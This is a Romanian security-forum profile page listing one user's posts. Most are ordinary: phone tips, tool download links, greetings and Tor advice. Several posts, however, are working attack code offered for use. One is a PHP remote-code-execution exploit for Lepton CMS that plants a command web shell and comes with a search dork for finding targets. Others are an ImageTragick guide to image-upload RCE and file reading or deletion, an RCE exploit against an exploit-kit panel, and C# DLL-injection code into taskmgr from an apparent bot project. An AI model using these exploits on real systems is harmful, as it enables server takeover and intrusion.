Jump to content

Jako

Active Members
  • Posts

    68
  • Joined

  • Last visited

Everything posted by Jako

  1. Jako

    Parere Iphone 7

    http://www.gsmarena.com/nokia_lumia_930-6227.php La precomanda nu-l ai inainte. La precomanda, uneori, poti beneficia de un pret mai bun/reducere si iti asigura produsul in cazul stocurilor limitate sau in cazul produselor populare care se vand foarte repede.
  2. Si-a cumparat cineva asa ceva sau a avut ocazia sa testeze?
  3. Jako

    to delete

    Mai bine nu-l mai contactezi pe unic, am vazut ca lumea se plange de serviciile oferite de catre el.
  4. Salut! Cainii latra, ursul trece...
  5. Jako

    Help?

    Tu in loc sa mergi la un doctor de specialitate, postezi pe un forum de securitate? Imi pare rau ca ai probleme, dar nu e loc potrivit...
  6. DLC Boot 2016 is a rescue disk that is used as a Recovery CD. The point is that if you are having problems such as Windows can not boot, missing MBR, want to format the hard drive, remove viruses and so on, you can simply use the DLC Boot 2016 to resolve these issue. DLC Boot 2016 is also able to backup / restore windows partition, create partitions, entering a locked Windows, and much more! * Integrated Mini Windows 10 32/64 bit * Integrated Mini Windows XP deducted from Hiren's version 15.2 and has been built, optimized again. TOOLS LIST: Download: https://docs.google.com/uc?id=0BxTOYa030FZmcDNvOTNhWFU3c00&export=download
  7. Din Recovery menu: Wipe cache partition Wipe data/factory reset Inchide telefonul - shutdown Scoate bateria pentru 30 de minute si lasa-l asa Reporneste-l Daca nu merge o sa te ajut eu. Vorbim pe chat sau prin pm.
  8. Jako

    Stiri IT - Betit.ro

    Arata foarte bine! Ce nu-mi place este "Ajuta-ne cu un like!". https://developers.google.com/speed/pagespeed/insights/?url=betit.ro Rezolva problemele de aici. https://chrome.google.com/webstore/detail/check-my-links/ojkcdipcgfaekbeaelaapakgnjflfglf?hl=en-GB Poate iti este de folos si extensia asta. https://developer.chrome.com/devtools/docs/network Check HTTP requests. https://www.betit.ro/sitemap_index.xml ???
  9. Jako

    Salut !

    Bine ai venit, sedere placuta!
  10. <?php /* Lepton CMS v2.2.2 - Remote Code Execution Dork: intext:"Design by CMS-LAB" */ $target = "http://127.0.0.1/lepton/install/save.php"; $payload = "');?><?php echo '<pre>'; system(\$_GET['cmd']); die();?>"; function curl_post($url, $post_data) { $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_POST, 15); curl_setopt($ch, CURLOPT_POSTFIELDS, $post_data); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 5.2; rv:10.0.1) Gecko/20100101 Firefox/10.0.1 SeaMonkey/2.7.1"); $output = curl_exec($ch); $info = curl_getinfo($ch); curl_close($ch); return $info; } $da = curl_post($target, "guid=E610A7F2-5E4A-4571-9391-C947152FDFB0&website_title=abc&lepton_url=a&default_timezone_string=Europe/London&default_language=EN&operating_system=linux&database_host=$payload&database_username=root&database_password=abc&database_name=test&table_prefix=abc_&admin_username=admin&admin_email=admin@admin.com&admin_password=admin&admin_repassword=admin"); if($da['http_code'] == 200) { echo "\nTada: Now visit /config.php?cmd= on target.\n"; } ?>
  11. Stiu ca s-a mai discutat pe forum despre asta, dar poate cuiva ii sunt folositoare informatiile. Should work for all image files (.jpg/.mvg/.svg/.png/etc.) Exploit Image contents: Example Image: More examples: HOW TO: 1. Find an Image uploader that uses ImageMagick to process images. (Try it @ http://attack32.samsclass.info/im.htm) 2. Craft a malicious image file 3. If it is running a vulnerable version, you'll have full RCE! TRICKS: 1. It's possible to read arbitrary files from a web server by uploading an ImageMagick Vector Graphics file (MVG) that the web application processes with ImageMagick: As is the case with all of these vulnerabilities, the file doesn't need to be uploaded with a .mvg extension. You can change it to .png, .jpg, or anything else. If the file doesn't exist, you'll see the @ symbol plus the filename as the output. 2. You can use a similar technique to delete a file, provided ImageMagick is built with support for it's ephemeral protocol: 3. You can move files around, provided you're able to determine the location of uploaded files. This can be used to upload new files as well as overwrite existing files. first_image.png: second_image.png: third_image.png: Additional info can be read here. HAVE FUN!
  12. import argparse import validators def get_gate(f): gate = '' pe = f.read() print len(pe) if len(pe) >= 63000 and len(pe) <= 100000: i = pe.find('YUIPWDFILE0YUIPKDFILE0YUICRYPTED0YUI1.0') - 3 if i > 0: while pe[i] != '\x00' and i >= 0: gate = pe[i] + gate i -= 1 return gate parser = argparse.ArgumentParser(description='Extract Pony binary gate.') parser.add_argument('FILE', type=argparse.FileType('rb'), help='Pony binary') args = parser.parse_args() gate = get_gate(args.FILE) if validators.url(gate): print gate else: print 'Gate not found!' VB6 version: https://github.com/Xyl2k/Pony-gate-extractor demo: http://cybercrime-tracker.net/ccpm.php
  13. download: http://download.nirsoft.net/nirsoft_package_1.19.101.zip mirror: http://download2.nirsoft.net/nirsoft_package_1.19.101.zip main website: http://www.nirsoft.net/ Freeware made by Emiel Wieldraaijer
  14. #!/usr/bin/env ruby require "base64" File.open('lista.txt', 'r') do |f1| while line = f1.gets val= line.split(":") b64decode=Base64.decode64(val[1]) printf "%s%s%s\n",val[0],":",b64decode end end in loc de lista.txt introdu numele listei tale.
  15. NoScript -> Forbid scripts globally, fara plug-ins cum a spus si wildchild mai sus. Poti sa folosesti Tortilla si o masina virtuala. http://download.crowdstrike.com/tortilla/Tortilla_v1.1.0_Beta.zip https://github.com/CrowdStrike/Tortilla Pe main OS instalezi Tortilla, rulezi masina virtuala si apoi in masina virtuala setezi sa foloseasca doar conexiunea creata de Tortilla.
  16. Ai nevoie doar de Tor browser pentru a accesa reteaua .onion. Nu-ti trebuie VPN. https://www.torproject.org/projects/torbrowser.html.en Documenteaza-te putin inainte! https://en.wikipedia.org/wiki/Tor_(anonymity_network) https://en.wikipedia.org/wiki/Virtual_private_network
  17. https://github.com/Xyl2k/XyliLabs-Ruins Nu e cine stie ce dar poate fi folositor unora, pe partea de simple panel, e-mail sender, ban system, research pentru front-end. Numai CSS, fara bootstrap. S-a folosit de Google Maps si MaxMind library. Alte resurse interesante si utile pt devi: https://developers.google.com/chart/interactive/docs/gallery http://artzub.com/ https://github.com/norsecorp
  18. <?php /* # # Phoenix Exploit Kit # - Remote Code Execution # : /includes/geoip.php */ $site = "http://127.0.0.1/phoenix/"; $target = "includes/geoip.php?bdr="; $payload = "passthru('uname -a')"; function curl_get($url) { $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 5.2; rv:10.0.1) Gecko/20100101 Firefox/10.0.1 SeaMonkey/2.7.1"); $output = curl_exec($ch); curl_close($ch); return $output; } echo curl_get($site.$target.$payload); ?>
  19. Jako

    Colectie link-uri

    Old darkode.com repository: http://darkode.cybercrime-tracker.net Directory listing script used for tracker: http://web2.uconn.edu/webdev/doc/scripts.htm#file_list_script
  20. using System; using System.Collections.Generic; using System.Text; using System.Threading; using System.Runtime.InteropServices; using System.Diagnostics; using System.IO; using System.Reflection; namespace alphabotcsharp { public class Injection { [DllImport("kernel32.dll")] public static extern IntPtr OpenProcess(int dwDesiredAccess, bool bInheritHandle, int dwProcessId); [DllImport("kernel32.dll", CharSet = CharSet.Auto)] public static extern IntPtr GetModuleHandle(string lpModuleName); [DllImport("kernel32", CharSet = CharSet.Ansi, ExactSpelling = true, SetLastError = true)] static extern IntPtr GetProcAddress(IntPtr hModule, string procName); [DllImport("kernel32.dll", SetLastError = true, ExactSpelling = true)] static extern IntPtr VirtualAllocEx(IntPtr hProcess, IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect); [DllImport("kernel32.dll", SetLastError = true)] static extern bool WriteProcessMemory(IntPtr hProcess, IntPtr lpBaseAddress, byte[] lpBuffer, uint nSize, out UIntPtr lpNumberOfBytesWritten); [DllImport("kernel32.dll")] static extern IntPtr CreateRemoteThread(IntPtr hProcess, IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId); // privileges const int PROCESS_CREATE_THREAD = 0x0002; const int PROCESS_QUERY_INFORMATION = 0x0400; const int PROCESS_VM_OPERATION = 0x0008; const int PROCESS_VM_WRITE = 0x0020; const int PROCESS_VM_READ = 0x0010; // used for memory allocation const uint MEM_COMMIT = 0x00001000; const uint MEM_RESERVE = 0x00002000; const uint PAGE_READWRITE = 4; public static bool isInjected = false; [DllImport("kernel32.dll", SetLastError = true, CallingConvention = CallingConvention.Winapi)] [return: MarshalAs(UnmanagedType.Bool)] private static extern bool IsWow64Process( [In] IntPtr hProcess, [Out] out bool wow64Process ); static bool is64BitProcess = (IntPtr.Size == 8); static bool is64BitOperatingSystem = is64BitProcess || InternalCheckIsWow64(); public static int inject(string dllPath, Process tProcess) { Process targetProcess = tProcess; string dllName = dllPath; // the target process // geting the handle of the process - with required privileges IntPtr procHandle = OpenProcess(PROCESS_CREATE_THREAD | PROCESS_QUERY_INFORMATION | PROCESS_VM_OPERATION | PROCESS_VM_WRITE | PROCESS_VM_READ, false, targetProcess.Id); // searching for the address of LoadLibraryA and storing it in a pointer IntPtr loadLibraryAddr = GetProcAddress(GetModuleHandle("kernel32.dll"), "LoadLibraryA"); // name of the dll we want to inject // alocating some memory on the target process - enough to store the name of the dll // and storing its address in a pointer IntPtr allocMemAddress = VirtualAllocEx(procHandle, IntPtr.Zero, (uint)((dllName.Length + 1) * Marshal.SizeOf(typeof(char))), MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE); // writing the name of the dll there UIntPtr bytesWritten; WriteProcessMemory(procHandle, allocMemAddress, Encoding.Default.GetBytes(dllName), (uint)((dllName.Length + 1) * Marshal.SizeOf(typeof(char))), out bytesWritten); // creating a thread that will call LoadLibraryA with allocMemAddress as argument CreateRemoteThread(procHandle, IntPtr.Zero, 0, loadLibraryAddr, allocMemAddress, 0, IntPtr.Zero); return 0; } public static void Execute() { string rawDLL = String.Empty; if(is64BitOperatingSystem) { rawDLL = Path.Combine(Path.GetDirectoryName(Assembly.GetEntryAssembly().Location), "h64.dll"); } else { rawDLL = Path.Combine(Path.GetDirectoryName(Assembly.GetEntryAssembly().Location), "h32.dll"); } // Execution of injection Process proc = Process.GetProcessesByName("taskmgr")[0]; Injection.inject(rawDLL, proc); isInjected = true; } public static Boolean isInjectedAlready() { if(isInjected) { return true; } else { return false; } } public static bool InternalCheckIsWow64() { if ((Environment.OSVersion.Version.Major == 5 && Environment.OSVersion.Version.Minor >= 1) || Environment.OSVersion.Version.Major >= 6) { using (Process p = Process.GetCurrentProcess()) { bool retVal; if (!IsWow64Process(p.Handle, out retVal)) { return false; } return retVal; } } else { return false; } } } }
×
×
  • Create New...